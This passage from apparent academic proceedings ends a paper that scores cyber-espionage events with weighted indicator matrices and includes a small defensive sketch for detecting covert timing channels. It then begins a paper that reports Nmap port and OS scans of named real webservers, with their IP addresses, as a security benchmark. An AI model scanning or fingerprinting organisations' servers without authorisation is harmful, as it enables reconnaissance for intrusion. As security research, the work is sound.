Robertson and Vigna (2004: 91-100) discuss a couple of effective approaches that use this kind of<br />
analysis to detect and classify unknown malware.<br />
On the other hand, analyzing the code during execution is called dynamic analysis. Dynamic analysis<br />
is effective against binaries that obfuscate themselves or are self-modifying: since every program must<br />
eventually run on a system, its behavior and subsequent system modifications can be observed during<br />
execution. Willems, Holz and Freiling (2007: 32-39) and<br />
Bayer et al (2006: 67-77) discuss dynamic analysis techniques that are successful in detecting<br />
unknown malware. Also, Rieck et al (2008: 108-125) used a learning based approach to automatically<br />
classify 70% of over 3,000 previously undetected malware binaries.<br />
4. Data exfiltration detection<br />
Data exfiltration detection helps us answer the question: “Is someone stealing data off the network?”<br />
Detecting suspicious and outright malicious events in the realm of data exfiltration is arguably the<br />
most difficult but most important to achieve out of the three steps of cyber espionage. Because the<br />
existence of a computer network implies the need for data to be accessed both inbound to and<br />
outbound from a network, the task of identifying a “bad” stream of data leaving the network amidst a<br />
flood of “good” data is daunting.<br />
Many convenient overt channels exist on the Internet. With a significant bulk of network traffic on<br />
any given local network being Internet-related, any web-based protocol offers a readily available overt<br />
channel within which a spy can easily exfiltrate stolen data. The sheer amount of web traffic makes it<br />
easy to hide the communication channel—the data is just one animal in a herd at that point.<br />
Fortunately, custom signatures can be generated for specific, sensitive data that would trigger a NIDS<br />
alert if this data were detected on its way out of a network (Liu, 2008).<br />
Thanks to several innovative research efforts, it is possible to detect many kinds of covert channels.<br />
Gianvecchio and Wang (2007) use a corrected conditional entropy (CCE) approach to accurately<br />
detect covert timing channels in HTTP (hypertext transfer protocol) traffic. Similarly, Cabuk, Brodley,<br />
and Shields (2009) use a measure of compressibility to distinguish covert timing channel traffic from<br />
conventional web-based traffic. While there are a multitude of other types of covert channels, like<br />
those using packet header fields or timestamps, there are approaches to eliminate, reduce, or at least<br />
detect these (Zander, Armitage, and Branch, 2007: 44-57).<br />
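One way to picture the compressibility measure of Cabuk, Brodley, and Shields: inter-packet delays are coarsened into a string and compressed, and the highly regular timing of a naive on/off covert channel compresses far better than jittery legitimate traffic. The sketch below is illustrative only; the delay distributions and coarsening precision are our assumptions, not the authors' parameters.<br />

```python
# Illustrative compressibility score for covert timing channel detection:
# regular inter-packet delays yield a repetitive string that zlib compresses
# well, so a high ratio flags suspiciously machine-like timing.
import random
import zlib

def compressibility(delays, precision=3):
    """Ratio of raw size to compressed size of the coarsened delay string."""
    s = ",".join(f"{d:.{precision}f}" for d in delays).encode()
    return len(s) / len(zlib.compress(s))

# a naive covert channel: two delay levels encoding bits (assumed pattern)
covert = [0.25, 0.5] * 200
# jittery, web-like inter-arrival gaps (assumed distribution, for illustration)
random.seed(1)
legit = [random.expovariate(4.0) for _ in range(400)]
```

A real detector would slide this measure over windows of observed traffic and compare it against a threshold calibrated on known-good traffic, rather than the toy sequences above.<br />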
5. Synthesis detection approach<br />
From the perspective of preventing the compromise of sensitive information, it is crucial to determine<br />
if anomalous, suspicious, or malicious occurrences are part of a cyber espionage attempt or not. In<br />
other words, to prevent cyber espionage, one must first be able to identify it reliably. However, there is<br />
a surprising lack of research focused on identifying or labeling network events as cyber espionage.<br />
The Defense Personnel Security Research Center (PERSEREC) produced a technical report in 2002<br />
on 150 cases of espionage against the United States by American citizens (Herbig and Wiskoff,<br />
2002). The Defense Intelligence Agency's (DIA) Counterintelligence and Security Activity (DAC) used<br />
the results of PERSEREC's report to produce a guide to aid its employees in reporting potential<br />
espionage-related behaviors in their colleagues (Office 2007). Essentially, the DIA relies on a<br />
synthesis of indicators to aid in its detection of spies.<br />
This paper adopts the same synthesis approach to detecting cyber espionage. Operating under the<br />
premise that cyber espionage emits telltale signs, the search for these indicators begins by looking at<br />
a series of questions with, hopefully, intuitive and obvious answers that lead to a framework of<br />
measurement.<br />
5.1 How would a spy infiltrate a network?<br />
If an attacker were only concerned with gaining access into a network, he would justifiably launch as<br />
many attacks against as many victims as possible. This increases his likelihood of success. But this<br />
torrent of binary madness will also draw much attention. A cyber spy who intends to steal sensitive<br />
information from a network will typically take a more streamlined avenue into the network, one that is<br />
less noisy and has a higher probability of success. This mentality and intention will drive the spy to<br />
use more strategy in choosing his attack tools and methods. Also, based on the spy’s knowledge of<br />
his victims and his desire to evade detection, he will target a relatively small number of victim<br />
systems. Spear phishing emails sent to a handful of selected victims are indicative of espionage. In<br />
addition, if the content of the email is tailored to be very specific and relevant to the industry, then this<br />
would be a telltale sign of cyber espionage. This thought process reveals a couple of indicators we can<br />
use to distinguish network intrusions that are highly probable espionage events from those that are<br />
not: targeted and tailored.<br />
5.2 What kind of malware would a spy use?<br />
If an attacker just wanted to infect as many machines as possible to expand his ever-growing botnet,<br />
this attacker's malware of choice would eventually run rampant and widespread across the Internet, or<br />
else it would not accomplish its master's goal. Looking at the other end of the spectrum, assuming a<br />
spy would want to evade detection and maintain persistent, reliable access to data, the spy would<br />
probably choose malware that is not easily detectable. Malware that is very well known is likely not<br />
the strategically-chosen tool of a cyber spy. In addition, since the name of the espionage game is to<br />
obtain information, it would make sense for espionage-related malware to have some sort of data-gathering<br />
functionality. Furthermore, if the malware is sophisticated enough to change tactics or focus<br />
182
David Merritt and Barry Mullins<br />
on certain information upon receiving new commands from the attacker, then this would be an even<br />
stronger indicator of espionage. Essentially, we have established two more indicators to find probable<br />
espionage malware: detectability and information-gathering.<br />
5.3 How would a spy exfiltrate data?<br />
We have already discussed that there are many ways to move data out of a network. In fact, the ease<br />
of data transfer is an underlying measure of network usefulness. If a typical network attacker were<br />
only concerned with collecting data regardless of who else sees it, then he may choose the most<br />
convenient avenue of data exfiltration. A cyber spy would want to follow the same mentality portrayed<br />
in his choice of network intrusion and malware infection techniques. That is, the spy would probably<br />
prefer to evade detection altogether, or at least attempt to hide his needle in the haystack of network<br />
traffic. In addition, the spy would most likely prefer to hide the data itself while it is transiting the<br />
network. Sending the stolen information over the network in clear text may reveal too much of his<br />
intent.<br />
Naturally, the spy would want to make his efforts worthwhile—the more data he can steal, the more<br />
worthwhile the mission. A spy who collects all information pertaining to a certain product will surely be<br />
sending relatively large amounts of data outbound, and his intentions would be difficult to detect if the<br />
data were encrypted. Clearly, very large amounts of encrypted data emanating from a network warrant<br />
a closer look, and this method of data exfiltration seems fairly spy-like. If this data could be decrypted<br />
to uncover very specific information relevant to the industry, especially if it is private or proprietary,<br />
then this is surely a telltale sign of espionage. In fact, this metric of industry-specific information is a<br />
strong indicator by itself. But it may not always be possible to decrypt the data in a timely manner, so<br />
we must include this indicator with other indicators of data exfiltration.<br />
Inherently, hiding the very existence of a communication channel screams of the intent to evade<br />
detection and, thus, warrants a closer look. Suffice it to say that the use of a covert channel is very<br />
spy-like. Therefore, more espionage indicators have been uncovered pertaining to data exfiltration:<br />
channel covertness, transfer size, encryption, and relevance of information.<br />
5.4 Espionage identification framework<br />
The following is a summary of potential indicators for cyber espionage:<br />
Intrusion:<br />
- Targeted with selective victims<br />
- Tailored through social engineering<br />
Malware:<br />
- Novel or unknown<br />
- Information/data-stealer<br />
Exfiltration:<br />
- Covert channel<br />
- Encrypted data or channel<br />
- Large amount of data<br />
- Industry-specific information<br />
These indicators can be used as an objective framework for subjective decision-making concerning<br />
the probability of espionage for a given event. An overall event that satisfies every intrusion, malware,<br />
and exfiltration indicator is likely espionage-related, but a cyber espionage event may not explicitly<br />
fulfill each and every indicator. In other words, the absence of one of these indicators does not<br />
automatically preclude an overall event from being attributable to cyber espionage.<br />
Given this framework, if there is a way to detect and subsequently score each individual intrusion,<br />
malware, or exfiltration event, then one can calculate a synthesis of those scores to categorize the<br />
overall intrusion + malware + exfiltration event. Taken a step further, if this synthesis score is related<br />
to the probability of cyber espionage, it is possible to use this score to measure the probability of the<br />
entire event as being cyber espionage.<br />
It is important to note that an individual event detected by itself may not indicate outright whether a<br />
circumstance is cyber espionage-related or not. A targeted, socially-engineered intrusion might be a<br />
sophisticated spam or phishing attempt. New and undetected information-stealing malware could be a<br />
new variant of benign adware. A consistent transfer of significant amounts of encrypted data could<br />
end up being an authorized VPN (virtual private network) connection. A covert channel may be subtle<br />
enough that its presence is difficult to detect and its intentions difficult to declare with certainty, but it<br />
does serve as an impetus to investigate further and determine the context of the channel.<br />
The advantage of this synthesis approach is that intrusion, malware, or exfiltration detection can<br />
be viewed within the context of the whole event. Not doing so could lead to incorrect conclusions<br />
being drawn from insufficient context. But each step of a cyber spy's attack methodology is not of<br />
equal value to the investigator. For instance, it is a challenge to judge the intent of malware simply by<br />
looking at its detectability and functionality. Many malicious programs have the same functionality but<br />
are used for different purposes. In fact, many legitimate programs are frequently used maliciously<br />
(e.g., Remote Administration Tools). On the contrary, a targeted intrusion that is industry-relevant<br />
hints at the intentions of the adversary: to quietly get to specific targets. Thus, the intrusion factor<br />
should be weighted more heavily than the malware factor. Similarly, with data exfiltration detection,<br />
covertness of the channel and sensitivity of the data are significant factors affecting the<br />
characterization of espionage. These factors should likewise be weighted more heavily than the<br />
malware factor.<br />
This strategic weighting of indicators is integrated to establish the Espionage Probability Matrix (EPM)<br />
framework, shown in Table 1. The EPM is used to determine an EPM score based on varying degrees<br />
of espionage probability, as indicated by the three columns of High, Medium, and Low Probability.<br />
Each indicator is assigned a value associated with its column, with High, Medium, and Low indicators<br />
being assigned values of 3, 2, and 1, respectively. The values for the indicators (e.g., targeted and<br />
tailored network intrusion) within each factor (e.g., Intrusion) are averaged to provide an EPM score<br />
for that factor. For example, a network intrusion that is not targeted at a specific user/group but<br />
contains somewhat tailored content results in an Intrusion factor EPM score of 1.5. This is calculated<br />
by averaging the “Not targeted” indicator (i.e., 1) with the “Potentially tailored” indicator (i.e., 2).<br />
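The averaging step above can be expressed in a few lines. This is a minimal illustrative sketch, not the authors' implementation; the helper name is hypothetical.

```python
# Hypothetical helper illustrating the per-factor EPM scoring step:
# each indicator is assigned 3 (High), 2 (Medium), or 1 (Low), and the
# factor score is the average of its indicator values.

def factor_score(indicator_values):
    """Average the 1-3 values assigned to a factor's indicators."""
    return sum(indicator_values) / len(indicator_values)

# Example from the text: a "Not targeted" indicator (1) averaged with a
# "Potentially tailored" indicator (2) gives an Intrusion score of 1.5.
print(factor_score([1, 2]))  # 1.5
```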
Table 1: Espionage Probability Matrix (EPM)<br />
Factor | Indicator | High Probability (3) | Medium Probability (2) | Low Probability (1)<br />
Intrusion | Targeted | Targeted; specific victims | Potentially targeted | Not targeted<br />
Intrusion | Tailored | Tailored; social engineering required | Potentially tailored; social engineering may be used | Well-known methods<br />
Malware | Detectability | Novel or unknown | Not well known; variant of known | Well known<br />
Malware | Information-gathering | Advanced info/data-stealer | Info/data-stealer | Not info/data-stealer<br />
Exfiltration | Channel covertness | Covert channel | Attempts to hide channel | No attempt to hide channel<br />
Exfiltration | Encryption | Custom encryption | Standard encryption | Not encrypted<br />
Exfiltration | Transfer size | Significant data transfer | Non-trivial data transfer | Negligible data transfer<br />
Exfiltration | Industry relevance | Industry-specific | Partially industry-specific | Not industry-specific<br />
The Intrusion row has an α multiplier, where α > 1, to represent the relative importance of intrusion<br />
classification to the overall EPM score. The Exfiltration row has a β multiplier, where β > 1, to<br />
represent the relative importance of data exfiltration classification to the overall EPM score. This<br />
effectively assigns greater importance to the factors that deserve it, as discussed. These individual<br />
probabilities are brought into context of the entire event by calculating an overall EPM score using the<br />
following equation:<br />
EPM Score = α·Intrusion + Malware + β·Exfiltration<br />
Essentially, summing the individual weighted scores yields a “grade” for intrusion, malware, and<br />
exfiltration classification taken within the context of one another. For the purpose of this paper, a<br />
notional α multiplier of 2 and a β multiplier of 3 are used to illustrate the effectiveness and flexibility of<br />
this synthesis approach. Operationally, these values can be fine-tuned and adjusted as needed.<br />
However, this score has little value without a translation into what it could mean. The EPM score is<br />
used in the Espionage Threshold Matrix (ETM), shown in Table 2.<br />
Table 2: Espionage Threshold Matrix (ETM), assuming α=2 and β=3<br />
Overall Probability of Cyber Espionage | EPM Score<br />
High Probability | ≥12<br />
Medium Probability | ≥9<br />
Low Probability | <9<br />
2010). The attackers use social engineering and target source code and intellectual property (Stamos<br />
2010: 1). This attack receives the maximum Intrusion and Malware EPM scores. In the absence of full<br />
details, we assume the exfiltration channel uses standard encryption, and the amount of data<br />
transferred is not significant from the perspective of each individual company. Exfiltration receives a<br />
score of 2.5 to produce an overall EPM score of 16.5. This is well above the threshold for high<br />
probability of cyber espionage, according to the ETM.<br />
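The walk-through above can be reproduced numerically. The sketch below is an illustration under the notional weights (α = 2, β = 3) and the ETM thresholds of Table 2; the function names are hypothetical.

```python
# Sketch of the EPM score and ETM thresholding, using the notional
# values from the text: alpha = 2, beta = 3, High >= 12, Medium >= 9.
ALPHA, BETA = 2, 3

def epm_score(intrusion, malware, exfiltration):
    """EPM Score = alpha * Intrusion + Malware + beta * Exfiltration."""
    return ALPHA * intrusion + malware + BETA * exfiltration

def etm_category(score):
    """Translate an EPM score into an overall espionage probability."""
    if score >= 12:
        return "High Probability"
    if score >= 9:
        return "Medium Probability"
    return "Low Probability"

# The attack as scored in the text: maximum Intrusion (3) and
# Malware (3) scores, with Exfiltration averaging to 2.5.
score = epm_score(3, 3, 2.5)
print(score, etm_category(score))  # 16.5 High Probability
```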
The scores of the EPM and thresholds of the ETM can be tuned according to a user's tolerance of<br />
false positives, false negatives, or strength of desire to prevent sensitive data loss. The ETM score<br />
can be a critical decision-making tool for network defenders and data owners who understand the<br />
importance of identifying cyber espionage using a reliable, consistent, and robust framework based<br />
on an innovative synthesis approach.<br />
6. Conclusion and future work<br />
This paper discusses the significant threat of cyber espionage and the importance of identifying and<br />
attributing activities to cyber espionage. The paper introduces a new synthesis approach and<br />
framework for identifying cyber espionage that fills the void in this research area due to the lack of<br />
formal methods for holistically determining cyber espionage events. This new approach capitalizes on<br />
current detection capabilities and integrates their results into a framework called the EPM. This<br />
framework takes into account the context of individual events to determine the likelihood of cyber<br />
espionage by using the ETM.<br />
Because this synthesis approach is the first formal methodology for categorizing holistic network<br />
events as cyber espionage, it raises several questions. Is this framework effective if all<br />
three steps of espionage cannot be detected, or if they are detected out of order (e.g., exfiltration is the<br />
initial indicator of a suspicious event)? How is effectiveness measured, and is there a more<br />
effective or efficient algorithm or methodology for identifying cyber espionage? Is it possible to<br />
automate the entire model, or will manual, human-in-the-loop processes always be needed?<br />
To help answer these questions, this approach and framework should be experimentally tested<br />
and analyzed. It will surely be helpful to create an automated system that gathers data, alerts, and<br />
other relevant information from network and host-based sensors as well as from human analysis and<br />
inputs. In addition, observing additional real-world espionage-related malware and network intrusions<br />
is important to measuring the effectiveness of this model and answering the questions posed above.<br />
Acknowledgements<br />
This research is funded by the Center for Cyberspace Research at the Air Force Institute of<br />
Technology and the 688 th Information Operations Wing at Lackland Air Force Base, Texas. The views<br />
expressed in this paper are those of the authors and do not reflect the official policy or position of the<br />
United States Air Force, Department of Defense, or the U.S. Government.<br />
References<br />
Cabuk, S., Brodley, C. E. and Shields, C. ‘IP Covert Channel Detection’, ACM Trans. Information and Syst.<br />
Security, vol. 12, no. 4, article 22, Apr. 2009.<br />
Ding, J., Jin, J., Bouvry, P., Hu, Y. and Guan, H. ‘Behavior-based Proactive Detection of Unknown Malicious<br />
Codes’, 2009 4 th Int. Conf. Internet Monitoring and Protection, Venice/Mestre, Italy.<br />
Epstein, K. (2008, Dec. 7) ‘U.S. Is Losing Global Cyber War, Commission Says’, BusinessWeek, [Online],<br />
Available: http://www.businessweek.com/bwdaily/dnflash/content/dec2008/db2008127_817606.htm?chan=top+news_top+news+index+-+temp_dialogue+with+readers.<br />
Gianvecchio, S. and Wang, H. ‘Detecting Covert Timing Channels: An Entropy-Based Approach’, Proc. 14th<br />
ACM Conf. on Computer and Communications Security, Alexandria, Virginia, October 28-31, 2007.<br />
Herbig, K. and Wiskoff, M. ‘Espionage Against the United States by American Citizens’, TRW Systems, Defense<br />
Personnel Security Research Center, Monterey, CA, Tech. Rep. 02-5, July 2002.<br />
Keizer, G. (2010, Sep. 15) ‘Google hackers behind Adobe Reader PDF zero-day bug, Symantec warns’, [Online],<br />
Available: http://news.techworld.com/security/3239606/google-hackers-behind-adobe-reader-pdf-zero-day-bug-symantec-warns/<br />
Kuang, L.L. and Zulkernine, M. ‘An anomaly intrusion detection method using the CSI-KNN Algorithm’, in Proc.<br />
2008 ACM Symposium on Applied Computing, Fortaleza, Ceara, Brazil, March 16-20.<br />
Liu, T., Corbett, C., Chiang, K., Archibald, R., Mukherjee, B. and Ghosal, D. ‘Detecting Sensitive Data Exfiltration<br />
by an Insider Attack’, Proc. 4th Annu. Workshop on Cyber Security and Information Intelligence Research:<br />
Developing Strategies to Meet Cyber Security and Information Intelligence Challenges Ahead, Oak Ridge,<br />
TN, May 12-14, 2008, vol. 288, no. 16.<br />
Office of the National Counterintelligence Executive (2007, Mar.) ‘Your Role in Combating the Insider Threat’,<br />
[Online], Available: http://www.ncix.gov/archives/docs/Your_Role_in_Combating_the_Insider_Threat.pdf.<br />
Patcha, A. and Park, J. M. ‘An overview of anomaly detection techniques: Existing solutions and latest<br />
technological trends’, Computer Networks, vol. 51, no. 12, Aug. 2007.<br />
Rieck, K., Holz, T., Willems, C., Dussel, P. and Laskov, P. ‘Detection of Intrusions and Malware, and Vulnerability<br />
Assessment’, Lecture Notes in Computer Science, vol. 5137, Berlin/Heidelberg, Germany: Springer,<br />
2008.<br />
SANS Institute (2008) ‘Top Ten Cyber Security Menaces for 2008’, [Online]. Available:<br />
http://www.sans.org/2008menaces/.<br />
Stamos, A. (2010) ‘”Aurora” Response Recommendations’, iSEC Partners, Inc.<br />
2008 Report to Congress, [Online], Available: http://www.uscc.gov/annual_report/2008/annual_report_full_08.pdf.<br />
Virus Bulletin Ltd. (2008, Sept. 2) ‘AV-Test Release Latest Results’, Virus Bulletin, [Online], Available:<br />
http://www.virusbtn.com/news/2008/09_02.<br />
Zander, S., Armitage, G., Branch, P. ‘A Survey of Covert Channels and Countermeasures in Computer Network<br />
Protocols’, IEEE Communications Surveys and Tutorials, vol. 9, no. 3, 2007.<br />
Zetter, K. (2010, Jan. 14) ‘Google hack attack was ultra sophisticated, new details show’, [Online], Available:<br />
http://www.wired.com/threatlevel/2010/01/operation-aurora/.<br />
Security Analysis of Webservers of Prominent<br />
Organizations of Pakistan<br />
Muhammad Naveed<br />
Free Lance Research, Pakistan<br />
mnaveed29@gmail.com<br />
Abstract: Insecure webservers are a serious threat to an organization’s reputation and resources. A successful<br />
attack on a webserver can destroy the trust of customers and people receiving services from the organization.<br />
Webservers were selected for this study because they provide an easily accessible entrance to the network from<br />
the Internet, and the security of webservers can be considered an index of an organization’s overall information<br />
security. This study analyzes the webservers of prominent organizations of Pakistan to assess their level of<br />
security. Webservers of different types of organizations were selected to provide a general view of the security of<br />
Pakistani webservers. The selected webservers belong to organizations that should be the first to secure their<br />
webservers, as they are the leaders in their respective fields in the country; smaller organizations can therefore<br />
be assumed to show even less concern for security. A benchmark for every type of organization was first<br />
established against which to compare the results of the analysis. The Nmap scanner was used to scan the<br />
webservers for security threats. The results reveal that webservers in Pakistan are not secure and that there is an<br />
extreme need for information security awareness in the country. The lack of importance given to information<br />
security can invite cyber terrorism and might create a lot of trouble for the country.<br />
Keywords: information security, analysis, security threats, Webserver, Pakistan, Nmap<br />
1. Introduction and background<br />
Security is one of the fundamental requirements for each and every network, just as it is a<br />
requirement for each and every human. Without proper security, a network is like a house without<br />
doors and windows. If the network holds a lot of valuable information and resources, it is like a<br />
bank full of money without any guards or security cameras. Just as that bank would be a prime<br />
target for theft or robbery, so it is with insecure networks. But human perceptions of an unsafe<br />
bank and of insecure networks differ greatly. People do not understand the ultimate consequences<br />
of insecure networks, and in Pakistan the situation is worst of all. Businesses and individuals do not<br />
even consider security to be an element that needs attention.<br />
Negligence in information security can have terrible consequences. It is not difficult to imagine the<br />
chaos created if an ill-intentioned person gained access to the website of the country’s most trusted<br />
news channel. Suppose he added a single headline claiming that a bomb had been placed at a<br />
specified place in the city or on some roadside: what trouble would people face? As another example,<br />
suppose he added one line claiming that the prime minister had said the country would soon attack its<br />
neighbor; this could end in a bloody feud between the two countries, or at least create<br />
misunderstandings and seriously damage the relationship between them. Trend Micro’s data-stealing<br />
malware focus report of June 2009 states, “In March 2008, data from 4.2 million credit card numbers<br />
were stolen in transmission as a result of malware installed on all of Hannaford Brothers’ servers in<br />
300 stores” (Trend Micro 2009). There are hundreds of other examples of attacks performed to<br />
achieve malicious objectives.<br />
The study analyzes the webservers of the most famous and reputable organizations of the country.<br />
Three types of organizations were considered: Education and Research, Commercial Organizations,<br />
and News Channels. A benchmark was first set by analyzing respected international organizations,<br />
whose analysis shows their webservers to be almost completely secure, so that the Pakistani results<br />
could be compared against them. Pakistani organizations of exactly the same types as those used to<br />
set the benchmarks were then analyzed to give an insight into information security awareness in the<br />
country. The organizations selected for analysis should be the first to implement security, given their<br />
status and business capacity. Webservers were selected because they can be easily analyzed from<br />
the Internet, and the analysis of a webserver provides insight into the complete network security of<br />
the organization. The Nmap scanner was used to obtain the results. The identities of the Pakistani<br />
organizations analyzed are kept secret because of possible damage to their reputations. However, it<br />
is simple to use the Nmap scanner to analyze any organization’s webserver and obtain almost the<br />
same results for many organizations of a similar type, so the results are basically an indicator of<br />
security awareness on a large scale.<br />
The Pakistan Computer Emergency Response Team’s list of reported hacked Pakistani websites<br />
from 1999 to 2005 is available online (PakCert 2005), and statistics of hacked Pakistani websites are<br />
shown in Figure 1 (PakCert 2008). Recently, many important Pakistani websites have been hacked,<br />
including those of the Supreme Court of Pakistan, the Pakistan Navy, and many other extremely<br />
important organizations (PakCert, 2005; PakCert, 2008; The Express Tribune, 2010; Jahanzaib,<br />
2010; GEO Pakistan, 2010; DawnNews, 2010).<br />
Figure 1: Statistics of hacked Pakistani websites (only .PK TLD) (PakCert (2008), ‘Defacement<br />
Statistics (January 1999 - August 2008)’, Pakistan Computer Emergency Response<br />
Team)<br />
The paper is organized as follows: Section 2 reviews related work, Section 3 shows the experimental<br />
setup used for the study, Section 4 explains the different port states reported by Nmap, Section 5 sets<br />
the benchmarks for comparison, Section 6 presents the actual analysis of webservers in Pakistan, and<br />
Section 7 concludes the paper and gives a simple solution to rectify the security problems.<br />
2. Related work<br />
Very little work has been done on analyzing the information security of Pakistani organizations. To<br />
the best of my knowledge, the first study to address the need for information security in Pakistan is<br />
(Syed 1998), which proposes that it is very important for Pakistan to have both offensive and<br />
defensive Information Warfare capabilities.<br />
Vorakulpipat et al. have explored information security practices in Thailand and have emphasized<br />
the need to benchmark an organization’s information security against best security practices<br />
(Vorakulpipat 2010). Ahmad A. Abu-Musa has conducted a survey to evaluate Computerized<br />
Accounting Information Systems security controls in Saudi organizations (Ahmad 2006). Rafael et al.<br />
have performed a survey of three hundred IT security specialists to evaluate Canadian IT security<br />
practices (Rafael 2009). The Australian Taxation Office conducted a review of its own information<br />
security practices to prevent any potential breach of data (Australian Taxation Office 2008). The US<br />
Environmental Protection Agency has conducted an audit to determine whether the Office of<br />
Administration’s (OARM’s) Integrated Contract Management System (ICMS) complies with Federal<br />
and Agency information system security requirements (United States Environmental Protection<br />
Agency 2006).<br />
The related work shows that while others are concerned about their already secure<br />
information systems and are working to avoid any potential attack, Pakistani organizations are not<br />
putting any effort into information security, which is evident from the hacking of the websites of the<br />
Supreme Court of Pakistan, the Pakistan Navy, and many other important websites.<br />
3. Experimental setup<br />
All the tests were performed from the Internet using the following system and software:<br />
Table 1: Experimental setup<br />
Computer Intel Pentium D, 3.2 GHz processor with 2 GB RAM<br />
Operating System Fedora 12 x86_64 (64bit Operating system)<br />
Scanning Software Nmap v5.21-1.x86_64 (a free open source scanner)<br />
4. Nmap port states<br />
According to Nmap official reference guide, the port states shown by Nmap are described as follows:<br />
4.1 open<br />
“An application is actively accepting TCP connections, UDP datagrams or SCTP<br />
associations on this port. Finding these is often the primary goal of port scanning.<br />
Security-minded people know that each open port is an avenue for attack. Attackers and<br />
pen-testers want to exploit the open ports, while administrators try to close or protect<br />
them with firewalls without thwarting legitimate users. Open ports are also interesting for<br />
non-security scans because they show services available for use on the network.” (Nmap<br />
Reference Guide)<br />
4.2 closed<br />
“A closed port is accessible (it receives and responds to Nmap probe packets), but there<br />
is no application listening on it. They can be helpful in showing that a host is up on an IP<br />
address (host discovery, or ping scanning), and as part of OS detection. Because closed<br />
ports are reachable, it may be worth scanning later in case some open up.<br />
Administrators may want to consider blocking such ports with a firewall. Then they would<br />
appear in the filtered state, discussed next.” (Nmap Reference Guide)<br />
4.3 filtered<br />
“Nmap cannot determine whether the port is open because packet filtering prevents its<br />
probes from reaching the port. The filtering could be from a dedicated firewall device,<br />
router rules, or host-based firewall software. These ports frustrate attackers because<br />
they provide so little information. Sometimes they respond with ICMP error messages<br />
such as type 3 code 13 (destination unreachable: communication administratively<br />
prohibited), but filters that simply drop probes without responding are far more common.<br />
This forces Nmap to retry several times just in case the probe was dropped due to<br />
network congestion rather than filtering. This slows down the scan dramatically.” (Nmap<br />
Reference Guide)<br />
4.4 unfiltered<br />
“The unfiltered state means that a port is accessible, but Nmap is unable to determine<br />
whether it is open or closed. Only the ACK scan, which is used to map firewall rulesets,<br />
classifies ports into this state. Scanning unfiltered ports with other scan types such as<br />
Window scan, SYN scan, or FIN scan, may help resolve whether the port is open.”<br />
(Nmap Reference Guide)<br />
4.5 open|filtered<br />
“Nmap places ports in this state when it is unable to determine whether a port is open or<br />
filtered. This occurs for scan types in which open ports give no response. The lack of<br />
response could also mean that a packet filter dropped the probe or any response it<br />
elicited. So Nmap does not know for sure whether the port is open or being filtered. The<br />
UDP, IP protocol, FIN, NULL, and Xmas scans classify ports this way.” (Nmap Reference<br />
Guide)<br />
4.6 closed|filtered<br />
“This state is used when Nmap is unable to determine whether a port is closed or filtered.<br />
It is only used for the IP ID idle scan.” (Nmap Reference Guide)<br />
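As a small illustration of how scan output might be post-processed against these states, ports can be tallied per state before any comparison is made. The data structure below is hypothetical; Nmap itself reports states in its own output formats.

```python
from collections import Counter

# Hypothetical parsed scan result: port number -> Nmap state string.
scan = {
    80: "open",
    135: "filtered",
    139: "filtered",
    443: "open",
    445: "filtered",
}

# Tally the number of ports in each state, a first step toward the
# benchmark comparisons made in the next section.
tally = Counter(scan.values())
print(tally["open"], tally["filtered"])  # 2 3
```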
5. Benchmark for the analysis<br />
The study was based on the following types of organizations:<br />
- Educational and Research<br />
- Commercial Organizations<br />
- News Channels<br />
Before analyzing the webservers in Pakistan, benchmarks were set using famous organizations that<br />
were assumed to be secure, and the scans also showed them to be secure. As the study is based on<br />
three types of organizations, we have set a benchmark for each of them.<br />
5.1 Education and research organizations<br />
To set the benchmark for education and research organizations, the Massachusetts Institute of<br />
Technology (MIT) webserver was scanned using its domain address. The scan results show the<br />
best security, which is very impressive and attests that highly skilled, information security-aware<br />
people are working on the network.<br />
MIT’s scan results show that the only open ports are those used by the webserver, which must be<br />
open to provide the web service; all other ports are blocked. The aggressive operating system<br />
scan reveals with 94% accuracy that the FreeBSD operating system is running on the server.<br />
The scan results for MIT are shown in Table 2 to Table 4.<br />
Table 2: Scan details for MIT<br />
Scanned Web Server www.mit.edu (18.9.22.169)<br />
Scan Launching Time 2010-08-14 00:50 PKST<br />
Scan Type Slow Comprehensive Scan<br />
Scan Time 2935.93 seconds<br />
Raw packets sent 4150 (156.946KB)<br />
Raw packets received 483 (29.058KB)<br />
Table 3: Port scan results for MIT<br />
Port Protocol State Service<br />
80 Tcp Open http<br />
443 Tcp Open http<br />
8001 Tcp Open http (probably for MIT Radio)<br />
Table 4: Aggressive OS scan results for MIT<br />
OS Name and Version | Type | Vendor | OS Family | OS Generation | Accuracy of result<br />
FreeBSD 6.2-RELEASE | General Purpose | FreeBSD | FreeBSD | 6.X | 94%<br />
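The benchmark criterion applied here, that only web-service ports should be open, can be sketched as a simple allowlist check. The helper and data structure are hypothetical; the port data is taken from Table 3.

```python
# Sketch of the benchmark test applied in this section: a webserver
# meets the benchmark if no port outside its expected web-service
# ports is in the "open" state.

def unexpected_open_ports(scan, allowed):
    """Return open ports that are not in the expected allowlist."""
    return {p for p, state in scan.items() if state == "open"} - allowed

# MIT's result from Table 3: only the web-service ports are open.
mit_scan = {80: "open", 443: "open", 8001: "open"}
extra = unexpected_open_ports(mit_scan, allowed={80, 443, 8001})
print(sorted(extra))  # [] -- meets the benchmark
```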
To further strengthen the benchmark, the Indian Institute of Technology Delhi (IITD) was also<br />
analyzed, which revealed that its webserver is also very secure. The only ports found open were<br />
those used by the webserver to provide web services; all other ports in use were either protected<br />
behind the firewall or blocked. The aggressive operating system scan<br />
shows, with 86% accuracy, a firewall OS probably installed on the organization’s firewall. Table 5<br />
to Table 7 show the results for IIT Delhi, India.<br />
Table 5: Scan details for IITD<br />
Scanned Web Server www.iitd.ac.in (220.227.156.20)<br />
Scan Launching Time 2010-08-14 00:55 PKST<br />
Scan Type Slow Comprehensive Scan<br />
Scan Time 3118.12 seconds<br />
Raw packets sent 3366 (126.658KB)<br />
Raw packets received 1368 (69.263KB)<br />
Table 6: Port scan results for IITD<br />
Port Protocol State Service<br />
80 Tcp Open http<br />
135 Tcp Filtered msrpc<br />
139 Tcp Filtered netbios-ssn<br />
443 Tcp Open http<br />
445 Tcp Filtered microsoft-ds<br />
593 Tcp Filtered http-rpc-epmap<br />
1720 Tcp Filtered H.323/Q.931<br />
2100 Tcp Filtered unknown<br />
4111 Tcp Filtered unknown<br />
4444 Tcp Filtered krb524<br />
5060 Tcp Filtered sip<br />
Table 7: Aggressive OS scan results for IITD<br />
OS Name and Version Type Vendor OS Family OS Generation Accuracy of result<br />
SonicWALL Aventail EX-1500 SSL VPN appliance Firewall SonicWALL Embedded No details available 86%<br />
5.2 Commercial organizations<br />
To set the benchmark for commercial organizations, the AT&T webserver was analyzed, which<br />
